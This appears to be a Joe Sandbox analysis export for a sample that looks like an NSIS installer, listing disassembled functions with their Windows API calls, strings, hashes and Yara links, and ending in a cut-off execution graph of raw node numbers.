                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcatwsprintf
                                                                                        • String ID: %02x%c$...
                                                                                        • API String ID: 3065427908-1057055748
                                                                                        • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                        • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                                        • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                        • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                                        Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OleInitialize.OLE32(00000000), ref: 00405057
                                                                                          • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                        • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                        • String ID: Section: "%s"$Skipping section: "%s"
                                                                                        • API String ID: 2266616436-4211696005
                                                                                        • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                        • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                                        • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                        • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                                        Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDC.USER32(?), ref: 00402100
                                                                                        • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                        • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1599320355-0
                                                                                        • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                                        • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                                        • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                                        • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                                        Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                        • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                                        • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                                        • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                        • String ID: Version
                                                                                        • API String ID: 512980652-315105994
                                                                                        • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                        • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                                        • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                        • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                                        Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                                        • GetTickCount.KERNEL32 ref: 00403303
                                                                                        • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                        • String ID:
                                                                                        • API String ID: 2102729457-0
                                                                                        • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                        • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                                        • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                        • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                                        Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                        • String ID:
                                                                                        • API String ID: 2883127279-0
                                                                                        • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                        • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                                        • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                        • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                                        Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                        • String ID: HideWindow
                                                                                        • API String ID: 1249568736-780306582
                                                                                        • Opcode ID: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
                                                                                        • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                                        • Opcode Fuzzy Hash: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
                                                                                        • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                                        Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                        • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfileStringlstrcmp
                                                                                        • String ID: !N~
                                                                                        • API String ID: 623250636-529124213
                                                                                        • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                        • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                                        • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                        • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                                        Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                        • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                        Strings
                                                                                        • Error launching installer, xrefs: 00405C48
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateHandleProcess
                                                                                        • String ID: Error launching installer
                                                                                        • API String ID: 3712363035-66219284
                                                                                        • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                        • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                                        • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                        • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                                        Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                        • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                          • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandlelstrlenwvsprintf
                                                                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                        • API String ID: 3509786178-2769509956
                                                                                        • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                        • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                                        • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                        • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                                        Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                        • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                                        • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                                        • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 190613189-0
                                                                                        • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                        • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                                        • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                        • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                                                        Execution Graph

                                                                                        Execution Coverage:4.1%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:2.4%
                                                                                        Total number of Nodes:2000
                                                                                        Total number of Limit Nodes:112
                                                                                        execution_graph 98004 aa9b8b 98007 aa86e0 98004->98007 98008 aa86fd 98007->98008 98009 ae0fad 98008->98009 98010 ae0ff8 98008->98010 98025 aa8724 98008->98025 98013 ae0fb5 98009->98013 98017 ae0fc2 98009->98017 98009->98025 98082 b1aad0 274 API calls __cinit 98010->98082 98080 b1b0e4 274 API calls 98013->98080 98032 aa898d 98017->98032 98081 b1b58c 274 API calls 3 library calls 98017->98081 98019 aa3c30 68 API calls 98019->98025 98020 ae1289 98020->98020 98021 aa3f42 68 API calls 98021->98025 98022 ae11af 98092 b1ae3b 89 API calls 98022->98092 98025->98019 98025->98021 98025->98022 98026 aa8a17 98025->98026 98025->98032 98036 aa53b0 98025->98036 98064 aa39be 98025->98064 98068 aa3938 68 API calls 98025->98068 98069 aa855e 274 API calls 98025->98069 98070 aa5278 98025->98070 98075 ac2f70 98025->98075 98078 aa84e2 89 API calls 98025->98078 98079 aa835f 274 API calls 98025->98079 98083 aa523c 98025->98083 98087 af73ab 59 API calls 98025->98087 98088 ab1c9c 98025->98088 98032->98026 98093 b0a48d 89 API calls 4 library calls 98032->98093 98037 aa53cf 98036->98037 98049 aa53fd Mailbox 98036->98049 98170 ac0fe6 98037->98170 98039 aa69fa 98040 ab1c9c 59 API calls 98039->98040 98050 aa5569 Mailbox 98040->98050 98041 aa69ff 98043 adf165 98041->98043 98044 ade691 98041->98044 98042 ac0fe6 59 API calls Mailbox 98042->98049 98184 b0a48d 89 API calls 4 library calls 98043->98184 98180 b0a48d 89 API calls 4 library calls 98044->98180 98045 ab1207 59 API calls 98045->98049 98049->98039 98049->98041 98049->98042 98049->98044 98049->98045 98049->98050 98052 adea9a 98049->98052 98055 ab1c9c 59 API calls 98049->98055 98057 af7aad 59 API calls 98049->98057 98058 adeb67 98049->98058 98059 ac2f70 67 API calls __cinit 98049->98059 98061 adef28 98049->98061 98063 aa5a1a 98049->98063 98094 aa7e50 98049->98094 98153 aa6e30 98049->98153 98050->98025 98051 ade6a0 98051->98025 98054 ab1c9c 59 API calls 98052->98054 98054->98050 98055->98049 98057->98049 98058->98050 98181 af7aad 59 API calls 98058->98181 98059->98049 98182 b0a48d 89 API calls 4 library calls 98061->98182 98183 b0a48d 89 API calls 4 library calls 98063->98183 98065 aa39c9 98064->98065 98066 aa3ea3 68 API calls 98065->98066 98067 aa39f0 98065->98067 98066->98067 98067->98025 98068->98025 98069->98025 98071 ac0fe6 Mailbox 59 API calls 98070->98071 98072 aa5285 98071->98072 98073 aa5294 98072->98073 98074 ab1a36 59 API calls 98072->98074 98073->98025 98074->98073 99095 ac2e74 98075->99095 98077 ac2f7b 98077->98025 98078->98025 98079->98025 98080->98017 98081->98032 98082->98025 98084 aa524a 98083->98084 98086 aa5250 98083->98086 98085 ab1c9c 59 API calls 98084->98085 98084->98086 98085->98086 98086->98025 98087->98025 98089 ab1caf 98088->98089 98090 ab1ca7 98088->98090 98089->98025 98091 ab1bcc 59 API calls 98090->98091 98091->98089 98092->98032 98093->98020 98095 aa7e79 98094->98095 98110 aa7ef2 98094->98110 98096 ae0adf 98095->98096 98098 aa7e90 98095->98098 98103 ae0b09 98095->98103 98191 b1cdc8 274 API calls 2 library calls 98096->98191 98097 ae0ad3 98190 b0a48d 89 API calls 4 library calls 98097->98190 98104 ae0c37 98098->98104 98117 aa7ea1 98098->98117 98133 aa7eb8 Mailbox 98098->98133 98102 aa53b0 274 API calls 98102->98110 98106 ae0b3d 98103->98106 98111 ae0b21 98103->98111 98107 ab1c9c 59 API calls 98104->98107 98105 ae09e1 98188 aa5190 59 API calls Mailbox 98105->98188 98106->98096 98193 b1a8fd 98106->98193 98107->98133 98108 aa806a 98108->98049 98110->98102 98110->98105 98110->98108 98128 aa8015 98110->98128 98135 aa7fb2 98110->98135 98152 ae09e9 98110->98152 98192 b0a48d 89 API calls 4 library calls 98111->98192 98113 ae0d0b 98120 ae0d41 98113->98120 98284 b1c9c9 95 API calls Mailbox 98113->98284 98115 ae0a33 98119 ab1c9c 59 API calls 98115->98119 98117->98133 98264 af7aad 59 API calls 98117->98264 98119->98133 98124 aa523c 59 API calls 98120->98124 98121 ae0bb7 98220 b07ed5 59 API calls 98121->98220 98122 ae0ce9 98266 aa4d37 98122->98266 98130 aa7ee7 98124->98130 98140 aa8022 Mailbox 98128->98140 98187 b0a48d 89 API calls 4 library calls 98128->98187 98129 ae0d1f 98131 aa4d37 84 API calls 98129->98131 98130->98049 98146 ae0d27 __wsetenvp 98131->98146 98132 ae0b6b 98200 b0789a 98132->98200 98133->98113 98133->98130 98265 b1c87c 85 API calls 2 library calls 98133->98265 98135->98128 98185 aa4230 59 API calls Mailbox 98135->98185 98137 ae0bc9 98221 ab35b9 59 API calls Mailbox 98137->98221 98140->98115 98140->98133 98186 af7aad 59 API calls 98140->98186 98141 ae0cf1 __wsetenvp 98141->98113 98145 aa523c 59 API calls 98141->98145 98144 ae0bd2 Mailbox 98149 b0789a 59 API 